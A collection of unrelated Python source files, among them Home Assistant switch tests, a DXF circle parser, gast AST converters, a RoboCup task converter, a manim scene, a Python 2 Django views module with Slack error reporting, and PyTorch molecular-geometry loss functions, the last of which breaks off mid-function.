@pytest.mark.asyncio
async def test_initialize(sut):
await sut.initialize()
assert sut.switch == "switch.test"
@pytest.mark.asyncio
async def test_turn_on(sut, mocker):
called_service_patch = mocker.patch.object(sut, "call_service")
await sut.on()
called_service_patch.assert_called_once_with("switch/turn_on", entity_id=sut.switch)
@pytest.mark.asyncio
async def test_turn_off(sut, mocker):
called_service_patch = mocker.patch.object(sut, "call_service")
await sut.off()
called_service_patch.assert_called_once_with(
"switch/turn_off", entity_id=sut.switch
)
@pytest.mark.asyncio
async def test_toggle(sut, mocker):
called_service_patch = mocker.patch.object(sut, "call_service")
await sut.toggle()
called_service_patch.assert_called_once_with("switch/toggle", entity_id=sut.switch)
|
class Circle:
'''
circle object
'''
END = ' 0'
X = ' 10'
Y = ' 20'
Z = ' 30'
RADIUS = ' 40'
LAYER = ' 8'
# circle object takes in the dxf list and the line
# number where the circle entity can be found
def __init__(self, dxf, start_line):
# initialise x, y, z, radius and id attributes
self.x = self.y = self.z = self.radius = self.id = None
# set current line number to input line number
line = start_line
# iterate over every line within the entity
while dxf[line] != self.END:
# if layer name found set id to layer name
if dxf[line] == self.LAYER:
self.id = dxf[line + 1]
# if a coordinate is found set x, y, z values
if (dxf[line] == self.X and
dxf[line + 2] == self.Y and
dxf[line + 4] == self.Z):
self.x = float(dxf[line + 1])
self.y = float(dxf[line + 3])
self.z = float(dxf[line + 5])
# if radius is found set radius
if (dxf[line] == self.RADIUS):
self.radius = float(dxf[line + 1])
line += 1
def svg_shape(self, color):
'''
function takes in color and returns
svg circle shape with given color
'''
# template svg circle
svg = ('<circle id="{id}" cx="{cx}" cy="{cy}" r="{r}" ' +
'stroke="{stroke}" stroke-width="50" ' +
'fill="none" />\n')
# return svg circle
return svg.format(cx=self.x, cy=-self.y, r=self.radius,
stroke=color, id=self.id)
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
def slice_(value, begins, ends, strides,
dtype=None, name=None, par=1,
value_ram_size=None, out_ram_size=None,
value_dtype=None):
slices = to_slices(begins, ends, strides)
return value[slices]
def to_slices(begins, ends, strides):
slices = []
for begin, end, stride in zip(begins, ends, strides):
slices.append(slice(begin, end, stride))
return tuple(slices)
|
"""
This creates an index.html file for a version downloads dir on
the openmdao.org site.
"""
import sys
import os.path
import hashlib
def file_md5(fpath):
"""Return the MD5 digest for the given file"""
with open(fpath,'rb') as f:
m = hashlib.md5()
while True:
s = f.read(4096)
if not s:
break
m.update(s)
return m.hexdigest()
def make_index():
startdir = os.path.abspath(os.path.dirname(__file__))
out = open('index.html', 'w')
version = os.path.basename(os.path.dirname(os.path.abspath(__file__)))
out.write('<html>\n\n')
out.write('<head>\n')
out.write(' <title>OpenMDAO Version %s Downloads</title>\n' % version)
out.write(' <link rel="stylesheet" href="/chrome/common/css/trac.css" type="text/css" />\n')
out.write(' <div id="header">\n')
out.write(' <a id="logo" href="http://openmdao.org/">\n')
out.write(' <img src="/chrome/site/Feb2010_OpenMDAOLogo.png" alt="OpenMDAO Logo" height="93" width="334" />\n')
out.write(' </a>\n')
out.write(' </div>\n')
out.write('</head>\n\n')
out.write('<body>\n')
out.write(' <br><br><br>\n')
out.write(' <h1 class="blog-title" id="openmdao">\n')
out.write(' OpenMDAO Version %s Downloads\n' % version)
out.write(' </h1>\n')
out.write(' <ul>\n')
out.write(' <li><a href="..">..</a>\n')
files = []
dirs = []
for f in os.listdir(startdir):
if f in ['index.html', 'mkdlversionindex.py'] or f.startswith('openmdao_src'):
continue
if os.path.isfile(f):
files.append(f)
else:
dirs.append(f)
for d in dirs:
#lpath = os.path.join(url, 'downloads', version, d)
out.write(' <li><a href="%s">%s</a>\n' % (d, d))
for f in files:
#lpath = os.path.join(url, 'downloads', version, f)
checksum = file_md5(f)
out.write(' <li><a href="%s#md5=%s">%s</a>\n'%(f, checksum, f))
out.write(' </ul>\n')
out.write('</body>\n</html>')
out.close()
if __name__ == '__main__':
make_index()
|
from typing import Tuple
from torch.utils.data import Dataset
from .datasets import get_dataset
from .augmentor import ContrastiveAugmentor
from .base_dataset_wrapper import BaseDatasetWrapper
class UnsupervisedDatasetWrapper(BaseDatasetWrapper):
"""Dataset wrapper for unsupervised image classification"""
def __init__(self,
batch_size: int,
valid_size: float,
input_shape: Tuple[int, int, int],
dataset: str):
"""
Args:
batch_size: batch size to use in train and validation data loaders
valid_size: percentage of the data to be used in validation set. Should be in range (0, 1)
input_shape: input size of the image. Should be Tuple (H, W, C), H - height, W - width, C - channels
dataset: dataset to use. Available datasets are in SUPPORTED_DATASETS
"""
super().__init__(batch_size, valid_size, input_shape, dataset)
def get_dataset(self, dataset: str) -> Dataset:
data_augmentations = ContrastiveAugmentor(dataset, self._input_size)
return get_dataset(dataset, True, data_augmentations, True, True)
|
from gast.astn import AstToGAst, GAstToAst
import gast
import ast
import sys
class Ast3ToGAst(AstToGAst):
def visit_Name(self, node):
new_node = gast.Name(
self._visit(node.id),
self._visit(node.ctx),
None,
)
return ast.copy_location(new_node, node)
def visit_arg(self, node):
new_node = gast.Name(
self._visit(node.arg),
gast.Param(),
self._visit(node.annotation),
)
return ast.copy_location(new_node, node)
def visit_ExceptHandler(self, node):
if node.name:
new_node = gast.ExceptHandler(
self._visit(node.type),
gast.Name(node.name, gast.Store(), None),
self._visit(node.body))
return ast.copy_location(new_node, node)
else:
return self.generic_visit(node)
if sys.version_info.minor < 5:
def visit_Call(self, node):
if node.starargs:
star = gast.Starred(self._visit(node.starargs), gast.Load())
ast.copy_location(star, node)
starred = [star]
else:
starred = []
if node.kwargs:
kwargs = [gast.keyword(None, self._visit(node.kwargs))]
else:
kwargs = []
new_node = gast.Call(
self._visit(node.func),
self._visit(node.args) + starred,
self._visit(node.keywords) + kwargs,
)
ast.copy_location(new_node, node)
return new_node
if 2 <= sys.version_info.minor <= 3:
def _make_annotated_arg(self, parent, identifier, annotation):
if identifier is None:
return None
new_node = gast.Name(
self._visit(identifier),
gast.Param(),
self._visit(annotation),
)
return ast.copy_location(new_node, parent)
def visit_arguments(self, node):
new_node = gast.arguments(
[self._visit(n) for n in node.args],
self._make_annotated_arg(node,
node.vararg,
self._visit(node.varargannotation)),
[self._visit(n) for n in node.kwonlyargs],
self._visit(node.kw_defaults),
self._make_annotated_arg(node,
node.kwarg,
self._visit(node.kwargannotation)),
self._visit(node.defaults),
)
return new_node
if sys.version_info.minor < 6:
def visit_comprehension(self, node):
new_node = gast.comprehension(
target=self._visit(node.target),
iter=self._visit(node.iter),
ifs=self._visit(node.ifs),
is_async=0,
)
return ast.copy_location(new_node, node)
class GAstToAst3(GAstToAst):
def _make_arg(self, node):
if node is None:
return None
new_node = ast.arg(
self._visit(node.id),
self._visit(node.annotation),
)
return ast.copy_location(new_node, node)
def visit_Name(self, node):
new_node = ast.Name(
self._visit(node.id),
self._visit(node.ctx),
)
return ast.copy_location(new_node, node)
def visit_ExceptHandler(self, node):
if node.name:
new_node = ast.ExceptHandler(
self._visit(node.type),
node.name.id,
self._visit(node.body))
return ast.copy_location(new_node, node)
else:
return self.generic_visit(node)
if sys.version_info.minor < 5:
def visit_Call(self, node):
if node.args and isinstance(node.args[-1], gast.Starred):
args = node.args[:-1]
starargs = node.args[-1].value
else:
args = node.args
starargs = None
if node.keywords and node.keywords[-1].arg is None:
keywords = node.keywords[:-1]
kwargs = node.keywords[-1].value
else:
keywords = node.keywords
kwargs = None
new_node = ast.Call(
self._visit(node.func),
self._visit(args),
self._visit(keywords),
self._visit(starargs),
self._visit(kwargs),
)
ast.copy_location(new_node, node)
return new_node
def visit_ClassDef(self, node):
self.generic_visit(node)
new_node = ast.ClassDef(
name=self._visit(node.name),
bases=self._visit(node.bases),
keywords=self._visit(node.keywords),
body=self._visit(node.body),
decorator_list=self._visit(node.decorator_list),
starargs=None,
kwargs=None,
)
return ast.copy_location(new_node, node)
if 2 <= sys.version_info.minor <= 3:
def visit_arguments(self, node):
if node.vararg is None:
vararg = None
varargannotation = None
else:
vararg = node.vararg.id
varargannotation = self._visit(node.vararg.annotation)
if node.kwarg is None:
kwarg = None
kwargannotation = None
else:
kwarg = node.kwarg.id
kwargannotation = self._visit(node.kwarg.annotation)
new_node = ast.arguments(
[self._make_arg(n) for n in node.args],
vararg, varargannotation,
[self._make_arg(n) for n in node.kwonlyargs],
kwarg, kwargannotation,
self._visit(node.defaults),
self._visit(node.kw_defaults),
)
return new_node
else:
def visit_arguments(self, node):
new_node = ast.arguments(
[self._make_arg(n) for n in node.args],
self._make_arg(node.vararg),
[self._make_arg(n) for n in node.kwonlyargs],
self._visit(node.kw_defaults),
self._make_arg(node.kwarg),
self._visit(node.defaults),
)
return new_node
def ast_to_gast(node):
return Ast3ToGAst().visit(node)
def gast_to_ast(node):
return GAstToAst3().visit(node)
|
from suii_protocol.task_protocol import TaskProtocol
from suii_mux_manager_comm.task_list import TaskList
from suii_protocol.protocol.enum_task_type import TaskType
from suii_mux_manager_comm.task import Task
## ===== RefBoxConverter ===== ##
# Converts from Refbox's ROS to our objects
class RefBoxConverter:
@staticmethod
def transportation_task_to_task(task):
source = TaskProtocol.look_up_value(TaskProtocol.location_dict, task.transportation_task.source.description.data)
if (source == -1):
print("Error look up for: %s" % task.transportation_task.source.description.data)
print("Please add to suii_protocol/protocol/enum_location_identifier")
print("And specify if you want instance ids generated in suii_protocol/task_protocol.py")
return None
destination = TaskProtocol.look_up_value(TaskProtocol.location_dict, task.transportation_task.destination.description.data)
if (destination == -1):
print("Error look up for: %s" % task.transportation_task.destination.description.data)
print("Please add to suii_protocol/protocol/enum_location_identifier")
print("And specify if you want instance ids generated in suii_protocol/task_protocol.py")
return None
object_to_pick = TaskProtocol.look_up_value(TaskProtocol.object_dict, task.transportation_task.object.description.data)
if (object_to_pick == -1):
print("Error look up for: %s" % task.transportation_task.object.description.data)
print("Please add to suii_protocol/protocol/enum_object_identifier")
return None
container = -1
if (task.transportation_task.container.description.data != ""):
container = TaskProtocol.look_up_value(TaskProtocol.container_dict, task.transportation_task.container.description.data)
if (container == -1):
print("Error look up for: %s" % task.transportation_task.container.description.data)
print("Please add to suii_protocol/protocol/enum_object_identifier")
return None
# create a new task
tmp_task = Task()
tmp_task.set_type(TaskProtocol.look_up_value(TaskProtocol.task_type_dict, TaskType.TRANSPORTATION.fullname))
tmp_task.set_source(source)
location = source if (source == -1) else destination
tmp_task.set_destination(location)
tmp_task.set_object(object_to_pick)
tmp_task.set_container(container)
return tmp_task
@staticmethod
def navigation_task_to_task(task):
dest_str = task.navigation_task.location.description.data
dest_str = dest_str.replace("Waypoint", "Way Point") # We don't use the same string for SOME reason :)
destination = TaskProtocol.look_up_value(TaskProtocol.location_dict, dest_str)
if (destination == -1):
print("Converter: Destination %s not found" % dest_str)
print("Please add to suii_protocol/protocol/enum_location_identifier")
print("And specify if you want instance ids generated in suii_protocol/task_protocol.py")
return None
tmp_task = Task()
tmp_task.set_type (TaskProtocol.look_up_value(TaskProtocol.task_type_dict, TaskType.NAVIGATION.fullname))
tmp_task.set_source(-1)
tmp_task.set_destination(destination)
tmp_task.set_object(-1)
tmp_task.set_container(-1)
tmp_task.set_orientation(task.navigation_task.orientation.data)
return tmp_task
@staticmethod
def navigation_task_list_to_task_list(nav_task_list):
result = TaskList()
for item in nav_task_list:
converted_task = RefBoxConverter.navigation_task_to_task(item)
result.task_list.append(converted_task)
return result
@staticmethod
def transportation_task_list_to_task_list(trans_task_list):
result = TaskList()
for item in trans_task_list:
converted_task = RefBoxConverter.transportation_task_to_task(item)
result.task_list.append(converted_task)
return result
@staticmethod
def ros_msg_to_task_list_object (msg):
tasks = msg.tasks
result = TaskList()
for task in tasks:
if task.type.data == int(TaskType.TRANSPORTATION):
result.task_list.append(RefBoxConverter.transportation_task_to_task(task))
elif task.type.data == int(TaskType.NAVIGATION):
result.task_list.append(RefBoxConverter.navigation_task_to_task(task))
else:
return None
return result
|
#!/usr/bin/env python
from manimlib.imports import *
from from_3b1b.old.clacks.question import BlocksAndWallExample
class NameBump(BlocksAndWallExample):
CONFIG = {
"name": "Grant Sanderson",
"sliding_blocks_config": {
"block1_config": {
"mass": 1e6,
"velocity": -0.5,
"distance": 7,
},
"block2_config": {},
},
"wait_time": 25,
}
def setup(self):
names = self.name.split(" ")
n = len(names)
if n == 1:
names = 2 * [names[0]]
elif n > 2:
names = [
" ".join(names[:n // 2]),
" ".join(names[n // 2:]),
]
# Swap, to show first name on the left
names = [names[1], names[0]]
name_mobs = VGroup(*map(TextMobject, names))
name_mobs.set_stroke(BLACK, 3, background=True)
name_mobs.set_fill(LIGHT_GREY, 1)
name_mobs.set_sheen(3, UL)
name_mobs.scale(2)
configs = [
self.sliding_blocks_config["block1_config"],
self.sliding_blocks_config["block2_config"],
]
for name_mob, config in zip(name_mobs, configs):
config["width"] = name_mob.get_width()
self.name_mobs = name_mobs
super().setup()
def add_blocks(self):
super().add_blocks()
blocks = self.blocks
name_mobs = self.name_mobs
blocks.fade(1)
def update_name_mobs(name_mobs):
for name_mob, block in zip(name_mobs, self.blocks):
name_mob.move_to(block)
target_y = block.get_bottom()[1] + SMALL_BUFF
curr_y = name_mob[0].get_bottom()[1]
name_mob.shift((target_y - curr_y) * UP)
name_mobs.add_updater(update_name_mobs)
self.add(name_mobs)
clack_y = self.name_mobs[1].get_center()[1]
for location, time in self.clack_data:
location[1] = clack_y
for block, name_mob in zip(blocks, name_mobs):
block.label.next_to(name_mob, UP)
block.label.set_fill(YELLOW, opacity=1)
# for name in names:
# file_name = name.replace(".", "")
# file_name += " Name Bump"
# scene = NameBump(
# name=name,
# write_to_movie=True,
# output_file_name=file_name,
# camera_config=PRODUCTION_QUALITY_CAMERA_CONFIG,
# )
|
import logging
import math
LOG_FORMAT = '%(asctime)s:%(levelname)s:%(message)s'
logging.basicConfig(filename='./Basic/div.log',
level=logging.DEBUG,
format=LOG_FORMAT)
def div(a, b):
try:
a/b
except ZeroDivisionError as e:
logging.error(e)
logging.error(e, exc_info=True) #capture the traceback in logging.error() by setting the excinfo* parameter to True
else:
return a/b
a=2
b=0
div_result = div(a,b)
logging.debug(f'division of {a}/{b} : {div_result}')
|
# -*- coding: utf-8 -*-
def limit(value, v_min, v_max):
"""
limit a float or int python var
:param value: value to limit
:param v_min: minimum value
:param v_max: maximum value
:return: limited value
"""
try:
return min(max(value, v_min), v_max)
except TypeError:
return None
class Relay:
def __init__(self):
self._value = False
self._last_value = False
def update(self, state):
"""Set the current relay state."""
self._last_value = self._value
self._value = state
@property
def state(self):
"""Get the current relay state."""
return self._value
def trigger_pos(self):
"""True on positive edge."""
return self._value and not self._last_value
def trigger_neg(self):
"""True on negative edge."""
return self._last_value and not self._value
def toggle(self):
"""Toggle relay state."""
self.update(not self._value)
|
# Create your views here.
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.contrib import auth
from django.conf import settings
from django.template.context_processors import csrf
from django.shortcuts import render
from django.http import Http404
from django.http import HttpResponse
from django.http import HttpResponseRedirect
import json as simplejson
import urllib, urllib2, re, logging, json, uuid, ast, datetime, os.path
from time import time, sleep
from datetime import timedelta
from HTMLParser import HTMLParser
# Custom imports
from slack_messenger import SlackMessenger
# Setup logging
logging.basicConfig(level=logging.DEBUG, format='[%(asctime)s] %(levelname)s api - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
################################################################################################
#
# Django Helpers
#
################################################################################################
def lg(msg, level=6):
if level == 0:
logging.error(str(msg))
else:
logging.info(str(msg))
return None
# end of lg
def process_exception(ex):
if settings.SEND_EX_TO_SLACK:
slack_msg = SlackMessenger(settings.USE_THIS_SLACK_CONFIG)
slack_msg.handle_send_slack_internal_ex(ex)
lg("Sent Slack Message", 0)
else:
lg("Hit Exception(" + str(ex) + ")", 0)
return None
# end of process_exception
def build_def_result(status="FAILED", error="Not Asssigned", record={}):
results = {
"Status" : status,
"Error" : error,
"Record" : record
}
return results
# end of build_def_result
################################################################################################
#
# Django Rendering Helper
#
################################################################################################
def shared_handle_render_to_response(request, short_name, normal_template, error_template, template_context):
try:
lg("Building Sharing Context", 6)
context = build_shared_template_content(request, normal_template)
lg("Returning Sharing Context", 6)
return render_to_response(normal_template, context, context_instance=RequestContext(request))
except Exception,k:
lg("Failed to render response: " + str(k), 0)
process_exception(k)
# end of try/ex
return None
# end of shared_handle_render_to_response
def build_shared_template_content(request, template):
try:
context = {
"ENV" : settings.TYPE_OF_SERVER,
"GA_TRACKING_CODE" : settings.GA_TRACKING_CODE
}
lg("Finding Meta(" + str(request.path) + ")", 6)
if str(request.path) in settings.META_PAGE_DATA:
for meta_name in settings.META_PAGE_DATA[str(request.path)]:
context[str(meta_name)] = settings.META_PAGE_DATA[str(request.path)][str(meta_name)]
# end of if this has seo meta data
session_hash = {}
if str(settings.SESSION_COOKIE) == "{}":
build_new_session(request, context, False)
else:
if str(settings.SESSION_COOKIE) in request.session and str(request.session[str(settings.SESSION_COOKIE)]) != "{}":
try:
session_hash = json.loads(request.session[str(settings.SESSION_COOKIE)])
return context
except Exception,sess:
lg("Invalid Session(" + str(request.session[str(settings.SESSION_COOKIE)]) + ") Ex(" + str(sess) + ")", 0)
# end of trying to decode session
# end of building the context for this user's identity for the template
# end of if/else existing session to check
return context
except Exception,k:
lg("Failed to build shared template content: " + str(k), 0)
process_exception(k)
# end of try/ex
return None
# end of build_shared_template_content
################################################################################################
#
# Django Session Helpers
#
################################################################################################
def build_new_session(request, session_hash, debug=False):
if debug:
lg("New Session Values(" + str(request.session) + ")", 6)
if str(settings.SESSION_COOKIE) in request.session:
if debug:
lg("Existing Session Cookie(" + str(request.session[settings.SESSION_COOKIE]) + ") Value(" + str(session_hash) + ")", 6)
request.session[str(settings.SESSION_COOKIE)] = session_hash
request.session.modified = True
return True
else:
request.session[str(settings.SESSION_COOKIE)] = session_hash
request.session.modified = True
return True
# end of Session Lite Checks
return False
# end of build_new_session
################################################################################################
#
# Django URL Handlers
#
################################################################################################
def internal_sitemap_xml(request):
return HttpResponse(open(str(settings.BASE_DIR) + "/webapp/sitemap.xml").read(), content_type='application/xhtml+xml')
# end of handle_sitemap_xml
def internal_robots_txt(request):
return HttpResponse(open(str(settings.BASE_DIR) + "/webapp/robots.txt").read(), content_type='text/plain')
# end of handle_robots_txt
def handle_home(request):
try:
lg("Home", 6)
# Change these for new URL Request Handlers:
short_name = "Home"
normal_template = str(settings.BASE_DIR) + "/webapp/templates/index.html"
if_there_is_an_error_template = str(settings.BASE_DIR) + "/webapp/templates/index.html"
template_context = {}
return shared_handle_render_to_response(request, short_name, normal_template, if_there_is_an_error_template, template_context)
except Exception,k:
lg("ERROR: " + str(k), 0)
process_exception(k)
# end of try/ex
return None
# end of handle_home
def handle_docs(request):
try:
lg("Docs Path(" + str(request.path) + ")", 6)
# Change these for new URL Request Handlers:
short_name = "Docs"
normal_template = str(settings.BASE_DIR) + "/webapp/templates/docs.html"
if_there_is_an_error_template = str(settings.BASE_DIR) + "/webapp/templates/docs.html"
template_context = {}
if str(request.path) != "/docs/":
filename = str(str(request.path).split("/")[-1])
normal_template = str(settings.STATIC_ROOT) + "/" + str(request.path).split("/")[-2] + "/" + str(request.path).split("/")[-1]
if os.path.exists(normal_template):
if ".txt" in filename:
lg("Docs(" + str(request.path) + ") Text(" + str(normal_template) + ")", 6)
return HttpResponse(open(normal_template).read(), content_type='text/plain')
else:
lg("Docs(" + str(request.path) + ") HTML(" + str(normal_template) + ")", 6)
else:
lg("Failed Doc Template(" + str(normal_template) + ")", 6)
normal_template = str(settings.BASE_DIR) + "/webapp/templates/" + str(request.path).split("/")[-1]
lg("Fallback-Docs(" + str(request.path) + ") Template(" + str(normal_template) + ")", 6)
# end of docs routing
return shared_handle_render_to_response(request, short_name, normal_template, if_there_is_an_error_template, template_context)
except Exception,k:
lg("ERROR: " + str(k), 0)
process_exception(k)
# end of try/ex
return None
# end of handle_docs
def handle_show_slack_error(request):
try:
lg("Slack Error Demo", 6)
try:
# Show the error in slack:
here_is_an_error_on_this_line # This will throw a 'not defined' error
except Exception,k:
lg("ERROR: " + str(k), 0)
process_exception(k)
# end of try/ex
lg("Done Slack Error Demo - Rerouting to Home for now", 6)
return handle_home(request)
except Exception,k:
lg("ERROR: " + str(k), 0)
process_exception(k)
# end of try/ex
return None
# end of handle_show_slack_error
################################################################################################
#
# Django Ajax Handler
#
################################################################################################
def handle_ajax_request(request):
status = "FAILED"
err_msg = "Nothing was processed"
record = {}
results = build_def_result(status, err_msg, record)
try:
################################################################################################
#
# Ajax handlers:
#
if request.is_ajax():
if request.method == "POST":
lg("Processing POST-ed AJAX", 6)
status = "SUCCESS"
err_msg = ""
post_results= handle_ajax_post(request)
if post_results["Status"] != "SUCCESS":
lg("ERROR: POST had error: " + str(post_results["Error"]), 0)
# end of if not successful
# Assign final results before sending back to the client:
status = post_results["Status"]
err_msg = post_results["Error"]
record = post_results["Record"]
elif request.method == "GET":
lg("Processing GET AJAX", 6)
status = "SUCCESS"
err_msg = ""
record = {}
else:
lg("Processing " + str(request.method) + ")", 6)
status = "SUCCESS"
err_msg = ""
record = {}
else:
lg("Invalid Ajax Request Sent to API", 0)
status = "Display Error"
err_msg = "Invalid Ajax Request Sent to API"
record = {}
# end of valid ajax post/get/other
results = build_def_result(status, err_msg, record)
except Exception,k:
err_msg = "Failed to handle AJAX Request with Ex(" + str(k) + ")"
lg(err_msg)
process_exception(k)
results = build_def_result("Display Error", err_msg, record)
# end of try/ex
response_content = simplejson.dumps(results)
return HttpResponse(response_content, content_type="application/json")
# end of handle_ajax_request
################################################################################################
#
# POST Handlers:
#
def handle_ajax_post(request):
status = "Display Error"
err_msg = "Failed to Process Post"
record = {
"StatusDiv" : "",
"ResultDiv" : ""
}
try:
posted_hash = simplejson.loads(request.body)
if "Action" not in posted_hash:
status = "Display Error"
err_msg = "Missing 'Action' Key in POST"
else:
action = str(posted_hash["Action"])
lg("POST - Processing(" + str(action) + ")", 6)
if action == "AjaxDemo":
proc_rs = handle_post_ajax_demo(posted_hash)
status = str(proc_rs["Status"])
err_msg = str(proc_rs["Error"])
record = proc_rs["Record"]
# end of AjaxDemo
else:
status = "Display Error"
err_msg = "Unsupported Ajax Action(" + str(action) + ")"
lg("ERROR: Failed POST" + str(err_msg), 0)
# If Slack is enabled, send the unsupported error:
if settings.SEND_EX_TO_SLACK:
slack_msg = SlackMessenger(settings.USE_THIS_SLACK_CONFIG)
slack_msg.handle_send_slack_internal_ex(err_msg)
# end of if send to slack
# end of if a supported server-side action
# end of handling all Posts
# Assign final results:
results = build_def_result(status, err_msg, record)
except Exception,e:
results = build_def_result("Display Error", "Failed to decode Post-ed JSON with Ex(" + str(e) + ")", record)
lg("ERROR: " + str(e), 0)
process_exception(e)
# end of try/ex
return results
# end of handle_ajax_post
# Specific POST Handlers:
def handle_post_ajax_demo(posted_hash):
action = "AjaxDemo"
status = "Display Error"
err_msg = "Failed to Process Post"
web_st_div = ""
web_rs_div = ""
record = {
"StatusDiv" : "",
"ResultDiv" : "",
"ResData" : {}
}
results = build_def_result(status, err_msg, record)
try:
lg("Running Server-side(" + str(action) + ")", 6)
# Assign the placeholders for coordinated server <-> client interaction for status and result fields
web_st_div = str(posted_hash["StatusDiv"])
web_rs_div = str(posted_hash["ResultDiv"])
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
rq_data = json.loads(posted_hash["Data"])
rs_data = {
"Response" : str(now) + " - Failed to Process"
}
# Assume the demo is sending a key with SendToServer in the json...otherwise process it as a bad Post message
if "SendToServer" in rq_data:
lg("Valid(" + str(action) + ") Received(" + str(rq_data["SendToServer"]) + ")", 6)
status = "SUCCESS"
err_msg = "SUCCESS"
rs_data = {
"Response" : str(now) + " - Server Received: " + str(rq_data["SendToServer"])
}
else:
lg("Invalid(" + str(action) + ") Received(" + str(rq_data) + ")", 6)
status = "Display Error"
err_msg = "Missing 'SendToServer' Value in the POST Data"
rs_data = {
"Response" : str(now) + " - Server Error: " + str(err_msg)
}
# end of processing the POST-ed json requested rq_data
# Assign final results:
record = {
"StatusDiv" : web_st_div,
"ResultDiv" : web_rs_div,
"ResData" : rs_data
}
results = build_def_result(status, err_msg, record)
except Exception,e:
results = build_def_result("Display Error", "Failed to Process Action(" + str(action) + ") with Ex(" + str(e) + ")", record)
lg("ERROR: " + str(e), 0)
process_exception(e)
# end of try/ex
return results
# end of handle_post_ajax_demo
|
import random
import dgl
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from scipy.optimize import linear_sum_assignment
from utils.chem import NODE_FEATS, BOND_TYPES
from models import utils
from models.baseline_models.egnn import EnEquiNetwork
from models.baseline_models.se3_trans import EquiSE3Transformer
from models.uni_transformer import UniTransformerO2TwoUpdateGeneral
from models.uni_transformer_o3 import UniTransformerO3TwoUpdateGeneral
def compute_l2_loss(batch, labels, gen_pos):
n_slices = np.cumsum([0] + batch.batch_num_nodes().tolist())
loss = 0.
for idx, graph in enumerate(dgl.unbatch(batch)):
pos = gen_pos[n_slices[idx]:n_slices[idx + 1]]
gt_pos = labels[n_slices[idx]:n_slices[idx + 1]]
gen_distmat = torch.norm(pos.unsqueeze(0) - pos.unsqueeze(1), p=2, dim=-1)
gt_distmat = torch.norm(gt_pos.unsqueeze(0) - gt_pos.unsqueeze(1), p=2, dim=-1)
loss += F.mse_loss(gen_distmat, gt_distmat, reduction='mean')
return loss, len(batch.batch_num_nodes())
def compute_min_loss(batch, labels, gen_pos, labels_slices, n_gen_samples, return_match_labels=False):
n_slices = np.cumsum([0] + batch.batch_num_nodes().tolist())
if labels_slices is None: # multiple generated mols, one reference mol
assert n_gen_samples > 1
cur_idx = 0
loss = 0.
for idx, graph in enumerate(dgl.unbatch(batch)):
num_nodes = batch.batch_num_nodes().tolist()[idx]
end_idx = cur_idx + num_nodes * n_gen_samples
all_pos = gen_pos[cur_idx:end_idx].view(n_gen_samples, num_nodes, 3)
gt_pos = labels[n_slices[idx]:n_slices[idx + 1]]
min_loss = None
for n_idx in range(len(all_pos)):
pos = all_pos[n_idx]
gen_distmat = torch.norm(pos.unsqueeze(0) - pos.unsqueeze(1), p=2, dim=-1)
gt_distmat = torch.norm(gt_pos.unsqueeze(0) - gt_pos.unsqueeze(1), p=2, dim=-1)
dist_loss = F.mse_loss(gen_distmat, gt_distmat, reduction='mean')
if min_loss is None or dist_loss < min_loss:
min_loss = dist_loss
loss += min_loss
else:
l_slices = np.cumsum([0] + labels_slices)
loss = 0.
match_labels = []
for idx, graph in enumerate(dgl.unbatch(batch)):
pos = gen_pos[n_slices[idx]:n_slices[idx + 1]]
label = labels[l_slices[idx]:l_slices[idx + 1]].view(-1, len(pos), 3)
min_loss = None
for l_idx in range(len(label)):
gt_pos = label[l_idx]
gen_distmat = torch.norm(pos.unsqueeze(0) - pos.unsqueeze(1), p=2, dim=-1)
gt_distmat = torch.norm(gt_pos.unsqueeze(0) - gt_pos.unsqueeze(1), p=2, dim=-1)
dist_loss = F.mse_loss(gen_distmat, gt_distmat, reduction='mean')
if min_loss is None or dist_loss < min_loss:
min_loss = dist_loss
m_label = label[l_idx]
match_labels.append(m_label)
loss += min_loss
if return_match_labels:
return loss, len(batch.batch_num_nodes()), torch.cat(match_labels, dim=0)
else:
return loss, len(batch.batch_num_nodes())
def compute_wasserstein_loss(batch, labels, gen_pos, labels_slices):
l_slices = np.cumsum([0] + labels_slices)
loss = 0.
for idx, graph in enumerate(dgl.unbatch(batch)):
num_nodes = graph.number_of_nodes()
pos = gen_pos[l_slices[idx]:l_slices[idx + 1]].view(-1, num_nodes, 3) # [n_samples, n_nodes, 3]
label = labels[l_slices[idx]:l_slices[idx + 1]].view(-1, num_nodes, 3)
num_samples = pos.shape[0]
assert pos.shape == label.shape
gen_distmat = torch.norm(pos.unsqueeze(1) - pos.unsqueeze(2), p=2, dim=-1)
gt_distmat = torch.norm(label.unsqueeze(1) - label.unsqueeze(2), p=2, dim=-1) # [n_samples, n_nodes, n_nodes]
all_dist_loss = torch.zeros(num_samples, num_samples)
for i in range(num_samples):
for j in range(num_samples):
# todo: F.l1_loss?
all_dist_loss[i][j] = F.mse_loss(gen_distmat[i], gt_distmat[j],
reduction='sum') # [n_samples, n_nodes, n_nodes]
# enumerate over all permutation (when n_samples is large, may need other bipartite matching algorithm)
gen_idx, gt_idx = linear_sum_assignment(all_dist_loss.detach().numpy())
dist_mse = F.mse_loss(gen_distmat[gen_idx, ...], gt_distmat[gt_idx, ...], reduction='none').view(-1, num_nodes * num_nodes)
wasserstein_loss = torch.mean(dist_mse.mean(-1).sqrt())
loss += wasserstein_loss
return loss, len(batch.batch_num_nodes())
def get_init_pos(propose_net_type, batch, labels, noise, gt_aug_ratio=0.05, noise_type='const',
n_ref_samples=1, n_gen_samples=1, labels_slices=None, eval_mode=False):
l_slices = np.cumsum([0] + labels_slices) if labels_slices is not None else None
if not eval_mode and (propose_net_type != 'gt' and np.random.rand() < gt_aug_ratio):
# data augmentation step where we feed the correct pos to the model and expect zero delta
if n_ref_samples == n_gen_samples:
init_pos = labels
elif n_ref_samples == 1 and n_gen_samples > 1:
all_init_pos = []
n, cur_idx = 0, 0
for idx, num_nodes in enumerate(batch.batch_num_nodes().tolist()):
all_init_pos.append(labels[cur_idx:cur_idx + num_nodes])
n += 1
if n >= n_gen_samples:
cur_idx += num_nodes
n = 0
init_pos = torch.cat(all_init_pos)
elif n_gen_samples == 1 and n_ref_samples > 1:
all_init_pos = []
for idx, num_nodes in enumerate(batch.batch_num_nodes().tolist()):
label = labels[l_slices[idx]:l_slices[idx + 1]].view(-1, num_nodes, 3)
rand_idx = random.randint(0, len(label) - 1)
init_pos = label[rand_idx]
all_init_pos.append(init_pos)
init_pos = torch.cat(all_init_pos)
else:
